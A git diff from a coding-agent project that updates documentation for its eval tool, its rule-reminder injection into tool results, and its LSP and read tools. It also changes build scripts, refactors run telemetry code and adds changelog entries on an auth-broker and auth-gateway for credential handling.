`packages/coding-agent/src/tools/eval.ts` receives `params.cells` already validated by the Zod schema — no string parsing step. +2. For each cell, `execute()` maps `cell.language` to an `EvalLanguage` (`"py"` → `"python"`, `"js"` → `"js"`) and calls `resolveBackend(session, language)`: + - `python` is gated on `eval.py !== false` and `pythonBackend.isAvailable(session)`. + - `js` is gated on `eval.js !== false`. + - A disabled or unavailable requested backend throws `ToolError`; there is no auto-fallback or sniffing. +3. The tool allocates an `OutputSink`, a `TailBuffer`, per-cell result objects, and a `sessionAbortController`. `session.trackEvalExecution?.(...)` can wrap the whole run for external cancellation tracking. +4. Cells execute sequentially. For each cell, `execute()`: + - clamps `(cell.timeout ?? 30) * 1000` ms through `clampTimeout("eval", ...)` - builds a combined abort signal from the tool signal, the timeout, and the session abort controller - marks the cell `running` and emits an update - - calls the backend’s `execute()` with `cwd`, `sessionId`, `sessionFile`, `kernelOwnerId`, `deadlineMs`, `reset`, artifact info, and chunk callback -6. JS cells dispatch through `packages/coding-agent/src/eval/js/index.ts` into `executeJs()`; Python cells dispatch through `packages/coding-agent/src/eval/py/index.ts` into `executePython()`. -7. Backend text chunks stream into the shared `OutputSink`; rich outputs are accumulated separately as JSON, images, markdown markers, and status events. -8. After each cell: + - calls the backend’s `execute()` with `cwd`, `sessionId`, `sessionFile`, `kernelOwnerId`, `deadlineMs`, `reset` (defaults to `false`), artifact info, and chunk callback +5. JS cells dispatch through `packages/coding-agent/src/eval/js/index.ts` into `executeJs()`; Python cells dispatch through `packages/coding-agent/src/eval/py/index.ts` into `executePython()`. +6. Backend text chunks stream into the shared `OutputSink`; rich outputs are accumulated separately as JSON, images, markdown markers, and status events. +7. After each cell: - text output is trimmed and stored on that cell result - multi-cell runs prefix text with `[i/n]` and the optional title - cancellations return early with `isError: true` and a cell-specific abort message - non-zero exit codes return early with `isError: true` and a message naming the failed cell - later cells are skipped after the first error, but earlier cell state persists in the underlying runtime -9. On success, the tool joins all cell outputs, synthesizes `(no text output)` or `(no output)` when needed, and attaches truncation metadata from `summarizeFinal()`. -10. The renderer uses `details.cells`, `details.jsonOutputs`, and `details.statusEvents` to build notebook-style output. `mergeCallAndResult = true` and `inline = true`, so call and result render together in the transcript. +8. On success, the tool joins all cell outputs, synthesizes `(no text output)` or `(no output)` when needed, and attaches truncation metadata from `summarizeFinal()`. +9. The renderer uses `details.cells`, `details.jsonOutputs`, and `details.statusEvents` to build notebook-style output. `mergeCallAndResult = true` and `inline = true`, so call and result render together in the transcript. ## Modes / Variants -### Parsing modes - -- Explicit multi-cell format with `*** Cell ...` headers -- Implicit single-cell fallback for bare code or a single fenced block -- Abort-recovery parse path when `*** Abort` is present - ### Backend selection -- Explicit Python backend -- Explicit JavaScript backend -- Auto-detected backend via `sniffEvalLanguage()` -- Fallback from requested/inferred Python to JS when Python is unavailable -- Fallback notice when JS markers are seen but `eval.js` is disabled and Python is used instead +Backend choice is **explicit per cell** — there is no auto-detection. + +- `language: "py"` → Python (IPython/Jupyter) backend +- `language: "js"` → JavaScript VM backend + +If the requested backend is disabled or unavailable, the tool throws `ToolError` for that cell. The caller chooses; the tool does not silently substitute. ### JavaScript runtime Implemented in `packages/coding-agent/src/eval/js/context-manager.ts` and `packages/coding-agent/src/eval/js/prelude.txt`. - Persistent `vm.Context` instances keyed by `js:${sessionId}` in `vmContexts` -- `rst` calls `resetVmContext(sessionKey)` before the cell executes +- `reset: true` calls `resetVmContext(sessionKey)` before the cell executes - Top-level `await` and bare `return` are supported by wrapping code in an async IIFE when `wrapCode()` sees `await` or `return` - Top-level static `import ... from ...` and dynamic `import(...)` calls are routed through `rewriteImports()`, which sends them via `__omp_import__` so the specifier resolves against the session cwd +- Module cache is busted for **local** imports between cells so edits to source files are picked up without restarting the runtime. `__omp_import__` deletes `require.cache[absPath]` before re-importing whenever the original specifier is a filesystem path: relative (`./x`, `../x`, `.`, `..`), POSIX-absolute (`/...`), home-prefixed (`~/...`), or Windows drive-letter (`C:\...` / `C:/...`). Bare specifiers (`react`, `lodash/x`) and URL/scheme specifiers (`node:fs`, `file://...`, `https://...`) are left in cache so package identity stays stable across cells. The cache-bust only fires when the resolved target is an absolute path — unresolved bare-package fallbacks (`resolveImportSpecifier()` returning the original specifier) skip it. - The prelude installs globals: - `display`, `print` - `read`, `write`, `append`, `sort`, `uniq`, `counter`, `diff`, `tree`, `env`, `output` @@ -155,7 +144,7 @@ Implemented in `packages/coding-agent/src/eval/py/executor.ts`, `packages/coding - Default mode is retained `session` kernels keyed by `python:${sessionId}` - Optional `python.kernelMode = "per-call"` creates a fresh kernel for each cell and shuts it down afterward -- `rst` disposes the retained kernel for that session before the cell runs; later Python cells in the same tool call reuse the fresh kernel +- `reset: true` disposes the retained kernel for that session before the cell runs; later Python cells in the same tool call reuse the fresh kernel - Startup path: - availability check - create/connect kernel @@ -177,8 +166,8 @@ Implemented in `packages/coding-agent/src/eval/py/executor.ts`, `packages/coding A single tool call can mix Python and JS cells. Persistence is per language runtime: -- resetting Python does not touch JS state -- resetting JS does not touch Python state +- `reset: true` on a Python cell does not touch JS state +- `reset: true` on a JS cell does not touch Python state - each backend keeps its own retained session keyed from the same session-derived ID ## Side Effects @@ -206,8 +195,9 @@ A single tool call can mix Python and JS cells. Persistence is per language runt ## Limits & Caps -- Per-cell timeout default: 30s (`DEFAULT_TIMEOUT_MS` in `packages/coding-agent/src/eval/parse.ts`; `TOOL_TIMEOUTS.eval.default` in `packages/coding-agent/src/tools/tool-timeouts.ts`) -- Timeout clamp: 1s minimum, 600s maximum (`TOOL_TIMEOUTS.eval` in `packages/coding-agent/src/tools/tool-timeouts.ts`) +- Per-cell timeout default: 30s (applied when `timeout` is omitted in `EvalTool.execute()`; clamped through `TOOL_TIMEOUTS.eval.default` in `packages/coding-agent/src/tools/tool-timeouts.ts`) +- Schema-level `timeout` range: integer `1..600` seconds (enforced by Zod on the cell schema) +- Timeout clamp at runtime: 1s minimum, 600s maximum (`TOOL_TIMEOUTS.eval` in `packages/coding-agent/src/tools/tool-timeouts.ts`) - Transcript code/output preview: 10 lines by default (`EVAL_DEFAULT_PREVIEW_LINES` in `packages/coding-agent/src/tools/eval.ts`) - Output truncation window: 50KB default (`DEFAULT_MAX_BYTES` in `packages/coding-agent/src/session/streaming-output.ts`) - Output line cap inside truncation helpers: 3000 lines (`DEFAULT_MAX_LINES` in `packages/coding-agent/src/session/streaming-output.ts`) @@ -222,24 +212,22 @@ A single tool call can mix Python and JS cells. Persistence is per language runt ## Errors -- Parse errors from `parseEvalInput()` throw immediately, for example invalid timeout strings. +- Zod validation rejects malformed `cells` arrays before `execute()` runs (missing `language`/`code`, out-of-range `timeout`, empty `cells`). - Missing session without proxy executor throws `ToolError("Eval tool requires a session when not using proxy executor")`. - Disabled/unavailable backends throw `ToolError` from `resolveBackend()`: - - `eval.py = false` - - `eval.js = false` - - Python kernel unavailable - - no backend available + - `eval.py = false` and a `py` cell is requested + - `eval.js = false` and a `js` cell is requested + - Python kernel unavailable and a `py` cell is requested - JS runtime exceptions are converted into text output plus `exitCode: 1`; cancellations return `cancelled: true` and may append `Command timed out`. - Python execution errors from the kernel become text output and `exitCode: 1`; later cells are skipped. - Python stdin requests are treated as errors with the message `Kernel requested stdin; interactive input is not supported.` - Cancellation is returned, not thrown, once backend execution has started. The tool formats it as a cell failure and sets `details.isError = true`. -- If parsing encountered `*** Abort`, the final text appends `ABORT_WARNING`, explicitly telling the model that earlier cells ran and state persists. - If output truncates, the tool still succeeds; truncation is surfaced through `details.meta` and artifact-backed full output when available. ## Notes -- The runtime parser is intentionally more permissive than `packages/coding-agent/src/eval/eval.lark`; maintain both when changing syntax. -- Cell language in `ParsedEvalCell` is not the last word: `EvalTool.execute()` may override backend selection for cells without an explicit header by inheriting the previous runtime language. +- Backend selection is now strictly explicit per cell: `language` must be `"py"` or `"js"`. The previous `*** Cell` header parser, the `eval.lark` constrained grammar, and the sniffer-based fallback have all been removed. +- `EvalTool.customFormat` no longer exists. Tool calls flow through the standard JSON schema; there is no Lark-constrained sampling path. - `tool.<name>()` exists only in JS. Python prelude helpers do not call back into the full tool registry. - JS helper paths reject protocol URIs (`://`) in `resolvePath()`; the JS prelude is filesystem-only unless the code calls `tool.read(...)` or another tool explicitly. - Python helper `output(...)` depends on `PI_SESSION_FILE`; it fails outside a session-backed run. diff --git a/docs/tools/lsp.md b/docs/tools/lsp.md index 7a4d273d8..cfc97551c 100644 --- a/docs/tools/lsp.md +++ b/docs/tools/lsp.md @@ -310,4 +310,5 @@ Same as `definition`, but sends `textDocument/implementation` and reports `imple - `reload` does not recreate a client immediately after killing it; the next request triggers reinitialization. - `workspace/applyEdit` can apply edits initiated by the server outside the direct tool action result path. - `detectLspmux()` can be disabled with `PI_DISABLE_LSPMUX=1`; only `rust-analyzer` is in `DEFAULT_SUPPORTED_SERVERS`. +- Startup LSP warmup (`discoverStartupLspServers(cwd)` in `sdk.ts`) is gated on `enableLsp && options.hasUI && settings.get("lsp.diagnosticsOnWrite")` — print/RPC/ACP/script sessions skip it and let `getOrCreateClient()` cold-start servers on demand. See `docs/sdk.md` § Startup performance. - `configCache` is per-process and never auto-invalidated; config changes require a fresh process to be observed by `getConfig()` callers. \ No newline at end of file diff --git a/docs/tools/read.md b/docs/tools/read.md index 71ae882ca..f99e75edb 100644 --- a/docs/tools/read.md +++ b/docs/tools/read.md @@ -10,7 +10,7 @@ - `packages/coding-agent/src/tools/archive-reader.ts` — detect `archive.ext:inner/path`, index archives, list/read entries. - `packages/coding-agent/src/tools/sqlite-reader.ts` — detect SQLite targets, parse selectors, render tables. - `packages/coding-agent/src/tools/fetch.ts` — URL parsing, fetch/render pipeline, URL cache/artifacts. - - `packages/coding-agent/src/internal-urls/router.ts` — resolve `agent://`, `artifact://`, `local://`, `mcp://`, `memory://`, `pi://`, `rule://`, `skill://`. + - `packages/coding-agent/src/internal-urls/router.ts` — resolve `agent://`, `artifact://`, `local://`, `mcp://`, `memory://`, `omp://`, `rule://`, `skill://`. - `packages/coding-agent/src/edit/notebook.ts` — convert `.ipynb` to editable `# %% [...] cell:N` text. - `packages/coding-agent/src/utils/file-display-mode.ts` — decide hashline vs line-number vs raw display. - `packages/coding-agent/src/workspace-tree.ts` — render directory trees. @@ -194,7 +194,7 @@ URL selectors are parsed separately in `packages/coding-agent/src/tools/fetch.ts ### Internal URLs - `read` does not resolve these itself; it delegates to `session.internalRouter.resolve()`. -- Registered protocols are outside this file, but the router in `packages/coding-agent/src/internal-urls/router.ts` is built for `agent://`, `artifact://`, `issue://`, `local://`, `mcp://`, `memory://`, `pi://`, `pr://`, `rule://`, and `skill://`. +- Registered protocols are outside this file, but the router in `packages/coding-agent/src/internal-urls/router.ts` is built for `agent://`, `artifact://`, `issue://`, `local://`, `mcp://`, `memory://`, `omp://`, `pr://`, `rule://`, and `skill://`. - `#handleInternalUrl()` behavior: - parses the URL with `parseInternalUrl()` so colons inside the host segment are legal - for `agent://`, treats non-root path extraction or `?q=` extraction as a special no-pagination mode diff --git a/docs/ttsr-injection-lifecycle.md b/docs/ttsr-injection-lifecycle.md index e8f25f846..3fa7047bf 100644 --- a/docs/ttsr-injection-lifecycle.md +++ b/docs/ttsr-injection-lifecycle.md @@ -108,7 +108,27 @@ Pending injections are cleared after content generation. ### Non-interrupting matches -If matched rules do not permit interruption (`interruptMode: "never"`, or source-specific `prose-only`/`tool-only` mismatch), they are still queued. After a successful non-error, non-aborted assistant message, `AgentSession` injects the hidden `ttsr-injection` custom message as a follow-up and schedules continuation. +Non-interrupting matches split by `matchContext.source`: + +- **`source === "tool"` (tool-source match).** The rule is bucketed into `#perToolTtsrInjections`, keyed by the matched tool call's `id`. There is **no** deferred follow-up turn and the stream is not aborted. When the tool actually produces a result, the `afterToolCall` hook prepends a rendered `ttsr-tool-reminder.md` block to `ctx.result.content` (a single `text` block inserted ahead of the tool's own content), and persists a `ttsr_injection` entry with the consumed rule names. The template payload is: + + ```xml + <system-reminder reason="rule_violation" rule="{{name}}" path="{{path}}"> + ... + {{content}} + </system-reminder> + ``` + +- **`source === "text"` / `"thinking"` (prose-source match).** Behavior is unchanged: the rule is queued in `#pendingTtsrInjections` and, after a successful non-error, non-aborted assistant message, `AgentSession` injects the hidden `ttsr-injection` custom message as a follow-up and schedules continuation. + +Within a single matching batch, each rule is attached to exactly one sibling tool call — if multiple sibling tool calls would satisfy the same rule, deduplication picks one and the others are left untouched. Multiple distinct rules can still fold onto the same tool call. + +#### Implications for tool authors and transcript readers + +- The tool's own `toolResult` content is preserved verbatim; the reminder is **prepended** as an additional leading text block. Renderers that assume `content[0]` is the tool's primary output must scan past any block whose text begins with `<system-reminder reason="rule_violation"` (or filter on the wrapper tag) to find the real payload. +- The reminder is in-band on the tool result, not a separate `custom_message`/`ttsr-injection` entry. Transcript readers looking for non-interrupting TTSR activity on tool-source rules MUST inspect tool results (and the persisted `ttsr_injection` entry list), not just synthetic injection entries. +- A single tool result may carry reminders for several rules concatenated with a blank line between rendered templates. +- If the assistant message ends with `stopReason === "aborted"` or `"error"` before the matched tools run, the pending per-tool buckets are cleared — those rules are **not** persisted as injected and remain eligible to re-trigger on a future turn (subject to repeat policy). ## 5. Repeat policy and gap logic @@ -169,7 +189,8 @@ Interactive mode uses `session.isTtsrAbortPending` to suppress showing the abort In the current runtime path: - interrupted injections append a hidden `custom_message` with `customType: "ttsr-injection"` and append a `ttsr_injection` entry via `appendTtsrInjection(...)` -- deferred non-interrupting injections are marked/persisted when their queued custom message reaches `message_end` +- deferred non-interrupting prose-source injections are marked/persisted when their queued custom message reaches `message_end` +- non-interrupting tool-source injections are marked at match time and persisted via `appendTtsrInjection(...)` from the `afterToolCall` hook when the matched tool's result is produced - `createAgentSession()` restores `existingSession.injectedTtsrRules` into `ttsrManager` Net effect: injected-rule suppression is persisted/restored across session reload/resume for the current branch path. @@ -196,5 +217,6 @@ During the timer window, state can change (user interruption, mode actions, addi - Duplicate rule names at capability layer: lower-priority duplicates are shadowed before registration. - Duplicate names at manager layer: second registration is ignored. - `contextMode: "keep"`: partial violating output can remain in context before reminder retry. -- `interruptMode: "never"` queues a deferred hidden injection after a successful assistant message rather than aborting mid-stream. +- `interruptMode: "never"`: prose-source matches queue a deferred hidden injection after a successful assistant message; tool-source matches fold an in-band `<system-reminder>` into the matched tool call's `toolResult` content via the `afterToolCall` hook (no mid-stream abort, no separate follow-up turn). +- Tool-source non-interrupting buckets are cleared when the parent assistant message ends with `stopReason === "aborted"` or `"error"`, so rules whose target tool never produced a result remain eligible to re-trigger. - Repeat-after-gap depends on turn count increments at `turn_end`; mid-turn chunks do not advance gap counters. diff --git a/package.json b/package.json index 7096316ad..36a99b45c 100644 --- a/package.json +++ b/package.json @@ -5,13 +5,12 @@ "packageManager": "bun@1.3.14", "workspaces": { "packages": [ - "packages/*" + "packages/*", + "python/robomp/web" ], "catalog": { "@agentclientprotocol/sdk": "0.21.0", "@anthropic-ai/sdk": "^0.94.0", - "@aws-sdk/client-bedrock-runtime": "^3.1043.0", - "@aws-sdk/credential-provider-node": "^3.972.39", "@babel/generator": "^7.29.1", "@babel/parser": "^7.29.3", "@babel/traverse": "^7.29.0", @@ -19,7 +18,6 @@ "@biomejs/biome": "^2.4.14", "@bufbuild/protobuf": "^2.12.0", "@bufbuild/protoc-gen-es": "^2.12.0", - "@google/genai": "^1.52.0", "@mozilla/readability": "^0.6.0", "@napi-rs/cli": "3.6.2", "@oh-my-pi/omp-stats": "15.1.2", @@ -33,8 +31,8 @@ "@opentelemetry/context-async-hooks": "^2.0.0", "@opentelemetry/sdk-trace-base": "^2.0.0", "@puppeteer/browsers": "^2.13.0", - "@smithy/node-http-handler": "^4.6.1", "@tailwindcss/node": "^4.2.4", + "@tailwindcss/vite": "^4.2.4", "@types/babel__generator": "^7.27.0", "@types/babel__traverse": "^7.28.0", "@types/bun": "^1.3.14", @@ -60,16 +58,18 @@ "partial-json": "^0.1.7", "postcss": "^8.5.14", "prettier": "^3.8.3", - "proxy-agent": "^8.0.1", "puppeteer-core": "^24.42.0", "react": "19.2.5", "react-chartjs-2": "^5.3.1", "react-dom": "19.2.5", "regexp-tree": "^0.1.27", + "solid-js": "^1.9.12", "tailwindcss": "^4.2.4", "turndown": "7.2.4", "turndown-plugin-gfm": "1.0.2", "typescript": "^6.0.3", + "vite": "^5.4.14", + "vite-plugin-solid": "^2.11.6", "winston": "^3.19.0", "winston-daily-rotate-file": "^5.0.0", "zod": "4.4.3" @@ -117,6 +117,23 @@ "stats:tools": "python3 scripts/session-stats/analyze.py tools", "stats:edits": "python3 scripts/session-stats/analyze.py edits", "stats:followups": "python3 scripts/session-stats/analyze.py followups", + "test:py": "python3 -m pytest -x python/omp-rpc/tests python/robomp/tests", + "robomp:install": "pip install -e 'python/robomp[dev]'", + "robomp:serve": "python3 -m robomp serve", + "robomp:test:integration": "ROBOMP_INTEGRATION=1 python3 -m pytest -x python/robomp/tests/test_worker_smoke.py", + "robomp:pi-artifacts": "docker build -t \"${PI_ARTIFACTS_IMAGE:-oh-my-pi/artifacts:dev}\" .", + "robomp:build": "bun run robomp:pi-artifacts && docker compose --project-directory python/robomp build", + "robomp:rebuild": "bun run robomp:pi-artifacts && docker compose --project-directory python/robomp build --no-cache", + "robomp:up": "docker compose --project-directory python/robomp up -d", + "robomp:down": "docker compose --project-directory python/robomp down", + "robomp:restart": "docker compose --project-directory python/robomp restart robomp", + "robomp:logs": "docker compose --project-directory python/robomp logs -f robomp", + "robomp:dev": "bun run robomp:build && bun run robomp:up && bun run robomp:logs", + "robomp:reset": "docker compose --project-directory python/robomp down -v && (docker image rm \"${PI_ARTIFACTS_IMAGE:-oh-my-pi/artifacts:dev}\" || true)", + "robomp:web:dev": "bun --cwd=python/robomp/web run dev", + "robomp:web:build": "bun --cwd=python/robomp/web run build", + "lint:py": "ruff check python && ruff format --check python", + "fix:py": "ruff check --fix python && ruff format python", "prepublishOnly": "bun run check", "prepare": "bun --cwd=packages/coding-agent run generate-docs-index", "publish": "bun run prepublishOnly && npm publish -ws --access public", diff --git a/packages/agent/README.md b/packages/agent/README.md index ce3a8e160..eb089dcd4 100644 --- a/packages/agent/README.md +++ b/packages/agent/README.md @@ -279,7 +279,7 @@ const agent = new Agent({ ## Tools -Define tools using `AgentTool` with a Zod parameter schema (via `z` from `@oh-my-pi/pi-ai`). Legacy TypeBox-authored schemas are still accepted at runtime and are lifted to Zod internally. +Define tools using `AgentTool` with a Zod parameter schema (via `z` from `@oh-my-pi/pi-ai`). ```typescript import { z } from "@oh-my-pi/pi-ai"; diff --git a/packages/agent/src/agent-loop.ts b/packages/agent/src/agent-loop.ts index 066e66e90..7dc409f2f 100644 --- a/packages/agent/src/agent-loop.ts +++ b/packages/agent/src/agent-loop.ts @@ -14,7 +14,7 @@ import { validateToolArguments, zodToWireSchema, } from "@oh-my-pi/pi-ai"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { createHarmonyAuditEvent, type HarmonyDetection, diff --git a/packages/agent/src/run-collector.ts b/packages/agent/src/run-collector.ts index 9cf34e0ee..731901ddf 100644 --- a/packages/agent/src/run-collector.ts +++ b/packages/agent/src/run-collector.ts @@ -139,9 +139,12 @@ interface ToolStart { * begin (provider crash, tracer swap mid-run), the corresponding record is * still emitted with `latencyMs: 0` rather than throwing. */ +const kChatStart = Symbol("agent.run-collector.chatStart"); +const kToolStart = Symbol("agent.run-collector.toolStart"); +type SpanWithChatStart = Span & { [kChatStart]?: ChatStart }; +type SpanWithToolStart = Span & { [kToolStart]?: ToolStart }; + export class AgentRunCollector { - readonly #chatStarts = new WeakMap<Span, ChatStart>(); - readonly #toolStarts = new WeakMap<Span, ToolStart>(); readonly #chats: ChatRecord[] = []; readonly #tools: ToolRecord[] = []; readonly #availableTools = new Set<string>(); @@ -179,12 +182,12 @@ export class AgentRunCollector { init: { readonly stepNumber: number; readonly model: Model; readonly provider?: string }, ): void { const provider = init.provider ?? init.model.provider; - this.#chatStarts.set(span, { + (span as SpanWithChatStart)[kChatStart] = { stepNumber: init.stepNumber, startedAtMs: performance.now(), model: init.model.id, provider, - }); + }; this.#modelsUsed.add(init.model.id); if (provider) this.#providersUsed.add(provider); } @@ -197,8 +200,8 @@ export class AgentRunCollector { readonly costUnavailableReason: string | undefined; }, ): void { - const start = this.#chatStarts.get(span); - this.#chatStarts.delete(span); + const start = (span as SpanWithChatStart)[kChatStart]; + (span as SpanWithChatStart)[kChatStart] = undefined; const usage = message.usage; // Public surface: `inputTokens` is the total cost-bearing input the // provider charged for, so it must include cache_read + cache_write. @@ -237,8 +240,8 @@ export class AgentRunCollector { * appear in the run summary. */ failChat(span: Span, fields: { readonly errorType: string }): void { - const start = this.#chatStarts.get(span); - this.#chatStarts.delete(span); + const start = (span as SpanWithChatStart)[kChatStart]; + (span as SpanWithChatStart)[kChatStart] = undefined; this.#chats.push({ stepNumber: start?.stepNumber ?? -1, model: start?.model ?? "", @@ -258,17 +261,17 @@ export class AgentRunCollector { } beginTool(span: Span, init: { readonly toolCallId: string; readonly toolName: string }): void { - this.#toolStarts.set(span, { + (span as SpanWithToolStart)[kToolStart] = { toolCallId: init.toolCallId, toolName: init.toolName, startedAtMs: performance.now(), - }); + }; this.#invokedTools.add(init.toolName); } endTool(span: Span, fields: { readonly status: ToolStatus; readonly errorType: string | undefined }): void { - const start = this.#toolStarts.get(span); - this.#toolStarts.delete(span); + const start = (span as SpanWithToolStart)[kToolStart]; + (span as SpanWithToolStart)[kToolStart] = undefined; this.#tools.push({ toolCallId: start?.toolCallId ?? "", toolName: start?.toolName ?? "", diff --git a/packages/agent/test/compaction-telemetry.test.ts b/packages/agent/test/compaction-telemetry.test.ts index 1cc920ad7..435accf6d 100644 --- a/packages/agent/test/compaction-telemetry.test.ts +++ b/packages/agent/test/compaction-telemetry.test.ts @@ -54,6 +54,8 @@ let provider: BasicTracerProvider; let contextManager: AsyncLocalStorageContextManager; beforeAll(() => { + trace.disable(); + context.disable(); contextManager = new AsyncLocalStorageContextManager().enable(); context.setGlobalContextManager(contextManager); provider = new BasicTracerProvider({ spanProcessors: [new SimpleSpanProcessor(exporter)] }); diff --git a/packages/agent/test/otel.test.ts b/packages/agent/test/otel.test.ts index df9892441..5505248e6 100644 --- a/packages/agent/test/otel.test.ts +++ b/packages/agent/test/otel.test.ts @@ -42,6 +42,8 @@ let provider: BasicTracerProvider; let contextManager: AsyncLocalStorageContextManager; beforeAll(() => { + trace.disable(); + context.disable(); contextManager = new AsyncLocalStorageContextManager().enable(); context.setGlobalContextManager(contextManager); provider = new BasicTracerProvider({ spanProcessors: [new SimpleSpanProcessor(exporter)] }); @@ -55,6 +57,7 @@ afterEach(() => { afterAll(async () => { await provider.shutdown(); context.disable(); + trace.disable(); }); function identityConverter(messages: AgentMessage[]): Message[] { diff --git a/packages/ai/CHANGELOG.md b/packages/ai/CHANGELOG.md index fd0b51be9..467f5fcec 100644 --- a/packages/ai/CHANGELOG.md +++ b/packages/ai/CHANGELOG.md @@ -1,6 +1,89 @@ # Changelog ## [Unreleased] +### Breaking Changes + +- Changed `AuthBrokerClient.fetchSnapshot()` to return status-based results (`200` or `304`) instead of always returning a raw snapshot body, so callers now need to branch on `status` +- Renamed public schema utilities in `@oh-my-pi/pi-ai/utils/schema` by replacing `sanitizeSchemaForGoogle`, `sanitizeSchemaForCCA`, `prepareSchemaForCCA`, and `sanitizeSchemaForMCP` with `normalizeSchemaForGoogle`, `normalizeSchemaForCCA`, and `normalizeSchemaForMCP` +- Added MCP schema normalization via `normalizeSchemaForMCP` for compatibility checks +- Removed the `StringEnum` helper from `@oh-my-pi/pi-ai/utils/schema`. Use `z.enum([...])` directly; Zod's emitted JSON Schema is already wire-compatible with Google and other providers. +- Renamed the concrete SQLite credential store class from `AuthCredentialStore` to `SqliteAuthCredentialStore`. `AuthCredentialStore` is now the persistence interface implemented by both the SQLite store and the new `RemoteAuthCredentialStore`. Update `new AuthCredentialStore(db)` / `AuthCredentialStore.open(...)` call-sites to `SqliteAuthCredentialStore`; type-position uses (`store: AuthCredentialStore`) continue to work unchanged. + +### Added + +- Added `onAuthError` to `StreamOptions` and wired `streamSimple()` to retry once with a replacement API key when the first provider response is a 401 before any assistant events are emitted +- Added generation-aware snapshot metadata (`generation`, `serverNowMs`, `refresher`, and `rotatesInMs`) to auth-broker snapshot responses to support client-side credential-rotation planning +- Added `transport: "pi-native"` on `Model` and the matching `streamPiNative` client. When `model.transport === "pi-native"`, `streamSimple` short-circuits the per-provider dispatch and POSTs the canonical `Context` to the auth-gateway's `POST /v1/pi/stream` endpoint. The response is SSE-framed `AssistantMessageEvent`s parsed by `readSseJson` and pushed verbatim into the local `AssistantMessageEventStream` — no wire-format translation, no partial-stripping reconstruction. Used by containerized omp installs (robomp slots, swarm extension, etc.) to route every LLM call through a credential-holding sidecar; the slot itself never sees the real provider tokens. Server-controlled fields (`apiKey`, `signal`, `fetch`, lifecycle callbacks, the provider-session map) are stripped from the wire body — `apiKey` rides in the `Authorization` header as the gateway bearer. +- Added `POST /v1/pi/stream` to the auth-gateway. Same auth + abort + model-resolution + codex-compat + prefix-cache plumbing as the foreign-wire routes; only the wire-format translation is skipped. Request body is `{ modelId, context, options?, stream? }` where `context` is the canonical pi-ai `Context` and `options` is `SimpleStreamOptions` with non-serializable fields stripped. Response is SSE-framed `AssistantMessageEvent` (terminated by `data: [DONE]`) when streaming, or `{ message: AssistantMessage }` JSON when `stream: false`. +- Added Vertex AI authentication via Google Application Default Credentials from `GOOGLE_APPLICATION_CREDENTIALS`, `~/.config/gcloud/application_default_credentials.json`, or metadata server tokens, with token caching and refresh skew control via `GOOGLE_VERTEX_REFRESH_SKEW_MS` +- Added support for Anthropic image message parts with `type: "url"` and `type: "file"` sources +- Added `stopSequences` and `frequencyPenalty` to shared stream options and wired them through to OpenAI request translation +- Added optional request cancellation support to auth-broker interactions by propagating `AbortSignal` into health, snapshot, usage, and refresh calls +- Added `AuthStorage.setConfigApiKey` / `removeConfigApiKey` / `clearConfigApiKeys` for config-sourced per-provider bearers (e.g. `models.yml` `providers.<name>.apiKey`). The new tier sits between runtime `--api-key` and stored credentials in `getApiKey`/`peekApiKey` resolution, so a bearer pinned in config now beats the broker's OAuth access token. Also suppresses OAuth `account_uuid` attribution when active, since outbound auth is the explicit config bearer, not OAuth. `describeCredentialSource` reports `"config override (models.yml)"` for visibility. +- Added per-model `additional_rate_limits` parsing to `openaiCodexUsageProvider`. The Codex `wham/usage` endpoint surfaces a separate `GPT-5.3-Codex-Spark` rate limit (`metered_feature: codex_bengalfox`) on Pro accounts; these now emit dedicated `openai-codex:spark:{primary,secondary}` `UsageLimit` entries with `scope.tier = "spark"`, mirroring how Anthropic exposes `anthropic:7d:sonnet` separately from the umbrella `anthropic:7d` bucket. The osx-widgets client already keyed spark detection off `limit.id.includes("spark")`; this populates that contract end-to-end. +- Added `GET /v1/usage` to the auth-broker API to expose aggregated usage reports from `AuthStorage.fetchUsageReports` +- Added auth-broker usage polling response handling that returns normalized usage reports plus generation timestamp for clients (5-min per-credential cache via `AuthStorage`) +- Added the auth-broker subsystem (`@oh-my-pi/pi-ai/auth-broker`) for sharing OAuth credentials across machines without leaking refresh tokens. +- `startAuthBroker(...)` boots a `Bun.serve` HTTP server exposing `GET /v1/healthz`, `GET /v1/snapshot`, `POST /v1/credential` (upsert), `POST /v1/credential/:id/refresh`, and `POST /v1/credential/:id/disable`. +- `AuthBrokerClient` is the matching HTTP client used by remote clients. +- `RemoteAuthCredentialStore` is a client-side `AuthCredentialStore` that mirrors a broker snapshot in memory; mutating methods (`replace*`, `upsert*`, `delete*ForProvider`) throw because writes are server-side only. +- `AuthBrokerRefresher` is the background refresh loop that pre-refreshes credentials within `refreshSkewMs` and disables on definitive failure (`invalid_grant` / non-network 401-403). +- Added `AuthStorage.exportSnapshot()`, `AuthStorage.upsertCredential(provider, credential)`, `AuthStorage.forceRefreshCredentialById(id)`, and `AuthStorage.disableCredentialById(id, cause)` public methods consumed by the auth-broker server. +- Added `AuthStorageOptions.refreshOAuthCredential` override so a remote-store client can route every OAuth refresh through the broker instead of the local OAuth endpoint. +- Added `REMOTE_REFRESH_SENTINEL` (`"__remote__"`) — the wire placeholder substituted for OAuth refresh tokens in broker snapshots; clients never see the real refresh token. +- Exposed the OAuth provider catalog (`getOAuthProviders`, `OAuthProvider`, `OAuthProviderInfo`) and `refreshOAuthToken` through the package barrel so the coding-agent CLI can target them without reaching into `utils/oauth`. +- Added the auth-gateway subsystem (`@oh-my-pi/pi-ai/auth-gateway`) — a forward-proxy that sits between unauthenticated clients (the macOS usage widget, llm-git, robomp containers, …) and the broker. Clients send standard provider-format requests; the gateway parses them into omp's canonical `Context`, dispatches through pi-ai's `streamSimple()`, and translates the canonical event stream back to the matching wire format. `Authorization` is injected server-side so access tokens never leave the gateway host. Wire surface: +- `GET /healthz` — unauth liveness. +- `GET /v1/usage` — aggregated provider usage; 5-min per-credential cache via `AuthStorage.fetchUsageReports`. +- `GET /v1/models` — model catalog (scoped to providers with credentials). +- `POST /v1/chat/completions` — OpenAI chat-completions in/out. +- `POST /v1/messages` — Anthropic messages in/out (text + thinking + tool_use blocks, SSE event taxonomy preserved). +- `POST /v1/responses` — OpenAI Responses in/out (reasoning items + function_call output items, SSE pass-through). +- Added exports from `@oh-my-pi/pi-ai/auth-gateway`: `startAuthGateway`, `AuthGatewayServerOptions`, `AuthGatewayBootOptions`, `AuthGatewayServerHandle`, `ModelResolver`, `DEFAULT_AUTH_GATEWAY_BIND`. Per-format `parseRequest` / `encodeResponse` / `encodeStream` triples are reachable via the `./providers/*` subpath as `openai-chat-server`, 